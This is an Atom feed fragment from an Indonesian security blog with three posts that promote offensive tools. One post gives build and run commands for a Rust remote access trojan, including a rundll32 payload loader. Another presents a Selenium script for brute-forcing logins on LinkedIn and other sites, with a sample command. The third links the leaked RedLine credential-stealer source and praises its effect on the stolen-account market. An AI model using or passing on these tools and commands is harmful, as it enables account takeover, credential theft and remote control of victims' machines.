href='https://www.blogger.com/feeds/1191330060666792521/posts/default/6516265396621714771'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1191330060666792521/posts/default/6516265396621714771'/><link rel='alternate' type='text/html' href='https://xybernote.blogspot.com/2022/12/demise-malware.html' title='Demise Malware'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2nzfIm9rHAHJ1uuvxDxNxTnpVRAl3Sr3DsBEeWgdq0bJCgoC4EAfSS6SqyxBOzDwAgJmcq-AcHfamvH24WxVkl6ql3PH88sHi-UvL9wpiFuVo0yqVpa0NmOa9M-F9ebyZ4zYxSJ5yqKs75tNXsdsZ0AAGmY7sH9MOr8_BnZeZ-WtiGH7lo-T8avK1/s72-w640-h502-c/184524385-89bda0f6-b46d-4e5e-868f-f044dac0ae1d.png" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1191330060666792521.post-5601150497016130924</id><published>2022-12-09T08:51:00.010-08:00</published><updated>2023-04-05T07:34:15.643-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Security"/><category scheme="http://www.blogger.com/atom/ns#" term="Malware"/><category scheme="http://www.blogger.com/atom/ns#" term="RAT"/><category scheme="http://www.blogger.com/atom/ns#" term="Trojan"/><category scheme="http://www.blogger.com/atom/ns#" term="xyber"/><title type='text'>Rust Remote Access Trojan</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDRVXyILS3Na_S18mAWyrCA2iwq9yfMvcufD8UjF5bKLD3G095gk-urz9-AmHTXQPuuLqepANtS2TEPplRCjnupX04mpqHCxzrwDwoXZUccY4SmC1nQqHv1SvZ43mY9isaunaDLBsozkfnaaS_CRa9rF5m4v712IKrrN60mOXPtzYguhWpi-f3-XeT/s1000/RedTrojan.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;450&quot; data-original-width=&quot;1000&quot; height=&quot;288&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDRVXyILS3Na_S18mAWyrCA2iwq9yfMvcufD8UjF5bKLD3G095gk-urz9-AmHTXQPuuLqepANtS2TEPplRCjnupX04mpqHCxzrwDwoXZUccY4SmC1nQqHv1SvZ43mY9isaunaDLBsozkfnaaS_CRa9rF5m4v712IKrrN60mOXPtzYguhWpi-f3-XeT/w640-h288/RedTrojan.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;Sumber &lt;b&gt;&lt;a href=&quot;https://github.com/rustrat/rustrat&quot;&gt;Github&lt;/a&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Repositori ini berisi beberapa folder dengan proyek yang berbeda.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;rustrat-client RAT itu sendiri&lt;/li&gt;&lt;li&gt;rustrat-server Server mendengarkan koneksi masuk (belum ditulis)&lt;/li&gt;&lt;li&gt;payload Proyek yang dikompilasi ke WebAssembly untuk eksekusi dan pustaka pembantu untuk pembuatan payload&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Membangun instruksi&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Jika skema database diubah, database contoh baru perlu dibuat. Pertama kode di rustrat-server untuk menginisialisasi database kosong harus diperbarui, kemudian database contoh baru harus dibuat. Ini dapat dicapai dengan menjalankan perintah berikut:&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;cargo run --bin update-dbtemplate&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;cargo sqlx -D sqlite://rustrat-server/dbtemplate.sqlite3?mode=ro prepare --merged&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Penggunaan&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;Komunikasi RAT ke server&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;cd payloads&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;cargo build&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;cd ../rustrat-server&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;cargo run# Pastikan untuk mencatat kunci publik, buka terminal baru&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;cargo run --bin rustrat-client-exe rustrat-client-exe rat localhost &amp;lt;public key from rustrat-server&amp;gt;&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;span&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;span&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;Kotak pesan akhirnya akan muncul&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Jalankan gumpalan wasm&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;rustrat-client-exe.exe wasm path\to\webassembly.wasm function_name&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;rundll32 rustrat_client.dll,rundll_run path\to\webassembly.wasm function_name&lt;/blockquote&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;Perhatikan bahwa fungsionalitas untuk menjalankan WebAssembly yang dikompilasi akan dipindahkan ke peti terpisah untuk tujuan pengembangan/debugging.&lt;/p&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1191330060666792521/posts/default/5601150497016130924'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1191330060666792521/posts/default/5601150497016130924'/><link rel='alternate' type='text/html' href='https://xybernote.blogspot.com/2022/12/rust-remote-access-trojan.html' title='Rust Remote Access Trojan'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDRVXyILS3Na_S18mAWyrCA2iwq9yfMvcufD8UjF5bKLD3G095gk-urz9-AmHTXQPuuLqepANtS2TEPplRCjnupX04mpqHCxzrwDwoXZUccY4SmC1nQqHv1SvZ43mY9isaunaDLBsozkfnaaS_CRa9rF5m4v712IKrrN60mOXPtzYguhWpi-f3-XeT/s72-w640-h288-c/RedTrojan.png" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1191330060666792521.post-7982998568658038752</id><published>2022-12-05T08:19:00.026-08:00</published><updated>2023-04-05T07:33:50.746-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Brute Force"/><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Security"/><category scheme="http://www.blogger.com/atom/ns#" term="xyber"/><title type='text'>Selenium Brute Force Login</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnWeil2LzhjECN5w_E4_thmuASrybY-J9ud2odN86KcNL3JHpXy6aDxwV2xDeGcCTBi15x0B8ZU1_L6Eb8664mC-ckK1yAC_VzFQhiF_J10NWuzJzLxyFgqsoojtRryY52z63E0zVYXxOdj-3Jd9z6FkbTfbYhzEk-c7zhF8Fy56zwe2GG36UHJ--t/s1200/What-is-a-Brute-Force-Attack-The-Complete-Guide.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;630&quot; data-original-width=&quot;1200&quot; height=&quot;336&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnWeil2LzhjECN5w_E4_thmuASrybY-J9ud2odN86KcNL3JHpXy6aDxwV2xDeGcCTBi15x0B8ZU1_L6Eb8664mC-ckK1yAC_VzFQhiF_J10NWuzJzLxyFgqsoojtRryY52z63E0zVYXxOdj-3Jd9z6FkbTfbYhzEk-c7zhF8Fy56zwe2GG36UHJ--t/w640-h336/What-is-a-Brute-Force-Attack-The-Complete-Guide.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;p&gt;Sumber &lt;b&gt;&lt;a href=&quot;https://github.com/mohammadkamrani/Selenium-Brute-Force&quot;&gt;Github&lt;/a&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Skrip default berguna untuk Linkedin, tetapi berfungsi untuk semuanya. Untuk platform lain, perlu mengekstrak id nama pengguna, id kata sandi, dan kelas tombol masuk menggunakan inspektur browser.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;Penggunaan.&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Untuk mendapatkan daftar opsi dan sakelar dasar gunakan: Skrip default berguna untuk Linkedin, tetapi berfungsi untuk semuanya. Untuk platform lain, perlu mengekstrak id nama pengguna, id kata sandi, dan kelas tombol masuk menggunakan inspektur browser.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5hIHGuplofaOjL0h9UiqzmCaIYGBXje4tdrR-Xrl4ZxxWOXBYuw31NAGawt_LZvERDZ5p81GbeOY0ZiF6dC7OsEq0BcU3A_-96g2SOrborxLpay3wt3XdrQBHtAm7McH8ZFG7MuX48cWh14auG5-sMPu_iL-ritCfVQSO-pl63nkmHDJT3HRvJFDF/s543/Capture.PNG&quot; style=&quot;margin-left: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;293&quot; data-original-width=&quot;543&quot; height=&quot;346&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5hIHGuplofaOjL0h9UiqzmCaIYGBXje4tdrR-Xrl4ZxxWOXBYuw31NAGawt_LZvERDZ5p81GbeOY0ZiF6dC7OsEq0BcU3A_-96g2SOrborxLpay3wt3XdrQBHtAm7McH8ZFG7MuX48cWh14auG5-sMPu_iL-ritCfVQSO-pl63nkmHDJT3HRvJFDF/w640-h346/Capture.PNG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;Contoh.&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Untuk mendapatkan daftar opsi dan sakelar dasar, gunakan:&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;selenium-brute.py -h&amp;nbsp;&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;sample:&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;selenium-brute.py -t &lt;b&gt;https://target.com &lt;/b&gt;-u admin -p pass.txt&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1191330060666792521/posts/default/7982998568658038752'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1191330060666792521/posts/default/7982998568658038752'/><link rel='alternate' type='text/html' href='https://xybernote.blogspot.com/2022/12/selenium-brute-force-login.html' title='Selenium Brute Force Login'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnWeil2LzhjECN5w_E4_thmuASrybY-J9ud2odN86KcNL3JHpXy6aDxwV2xDeGcCTBi15x0B8ZU1_L6Eb8664mC-ckK1yAC_VzFQhiF_J10NWuzJzLxyFgqsoojtRryY52z63E0zVYXxOdj-3Jd9z6FkbTfbYhzEk-c7zhF8Fy56zwe2GG36UHJ--t/s72-w640-h336-c/What-is-a-Brute-Force-Attack-The-Complete-Guide.png" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1191330060666792521.post-997836401495503988</id><published>2022-10-11T11:02:00.003-07:00</published><updated>2023-03-29T07:16:26.955-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Malware"/><category scheme="http://www.blogger.com/atom/ns#" term="xyber"/><title type='text'> Analisis dan Source Code RedLine 2020</title><content type='html'>&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaaIFjGQnSU2VHp9jMaObRGRzrht6-8iCcmXEybAfprna1612Oa_aWg96K-rA66y5NdnANZnp4C7xqdm5egQ3Y4MkKwKlYOdoaulbvojhdrkdGIqppjCo4zlN2Qs_XJUoALbykTZcmNh1uKboyE6a3MJhAycZw9Cg3uMd1vQ_TEqOdtAQWbxpWDJIN/s600/RedLine-Stealer-Malware-1.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;400&quot; data-original-width=&quot;600&quot; height=&quot;426&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaaIFjGQnSU2VHp9jMaObRGRzrht6-8iCcmXEybAfprna1612Oa_aWg96K-rA66y5NdnANZnp4C7xqdm5egQ3Y4MkKwKlYOdoaulbvojhdrkdGIqppjCo4zlN2Qs_XJUoALbykTZcmNh1uKboyE6a3MJhAycZw9Cg3uMd1vQ_TEqOdtAQWbxpWDJIN/w640-h426/RedLine-Stealer-Malware-1.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;Redline Stealer adalah malware yang tersedia di forum bawah tanah untuk dijual. Malware ini mengumpulkan informasi dari browser seperti kredensial yang disimpan, data pelengkapan otomatis, dan informasi kartu kredit. Inventarisasi sistem juga diambil saat dijalankan pada mesin target, untuk menyertakan detail seperti nama pengguna, data lokasi, konfigurasi perangkat keras, dan informasi mengenai perangkat lunak keamanan yang diinstal&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Redline telah bocor bertahun-tahun yang lalu dan bahkan retak. Saat ini ada 2 cara untuk mendapatkan source code dari &lt;a href=&quot;https://www.vx-underground.org/&quot;&gt;Vx-underground&lt;/a&gt; vault dan &lt;a href=&quot;https://github.com/xyber196/Redlinestealer-2020&quot;&gt;GitHub&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Pada saat sumber ini bocor, analisis menemukan bahwa pencuri sebenarnya mudah dibongkar dan dianalisis. server.exe pada saat itu tidak menjalankan kode dengan benar dan mudah untuk menyembunyikan dan menemukan server C&amp;amp;C dari log. Dan pada saat ini telah banyak versi crack bermunculan dan telah di upgrade.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Cara membelinya pun perlu lebih beragam dan tidak terpaku pada telegram karena tidak semua menggunakan telegram. Red-Line menginspirasi pasar lain untuk membakukan format pelaporan log agar lebih rapi dan mudah digunakan. Ini juga mendukung ekonomi dan pasar akun, membuka lebih banyak pekerjaan di sektor pemrograman, layanan, dan memberikan Peneliti Keamanan dan Perusahaan untuk berpikir lebih serius dan berdedikasi untuk melindungi penggunanya.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Harap diingat bahwa kode sumber ini atau exe yang mungkin berisikan atau menyembunyikan malware. Jalankan dengan sangat hati-hati menggunakan lab mesin virtual.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Analisis lengkap oleh&amp;nbsp;Blue team faction&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;a href=&quot;https://malware.news/t/dissecting-redline-infostealer-traffic-a-soapy-endeavour/56444&quot;&gt;Malware News&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://securityscorecard.com/research/detailed-analysis-redline-stealer/&quot;&gt;Security Score Card&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1191330060666792521/posts/default/997836401495503988'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1191330060666792521/posts/default/997836401495503988'/><link rel='alternate' type='text/html' href='https://xybernote.blogspot.com/2022/10/analisis-dan-source-code-redline-2020.html' title=' Analisis dan Source Code RedLine 2020'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaaIFjGQnSU2VHp9jMaObRGRzrht6-8iCcmXEybAfprna1612Oa_aWg96K-rA66y5NdnANZnp4C7xqdm5egQ3Y4MkKwKlYOdoaulbvojhdrkdGIqppjCo4zlN2Qs_XJUoALbykTZcmNh1uKboyE6a3MJhAycZw9Cg3uMd1vQ_TEqOdtAQWbxpWDJIN/s72-w640-h426-c/RedLine-Stealer-Malware-1.jpg" height="72" width="72"/></entry></feed>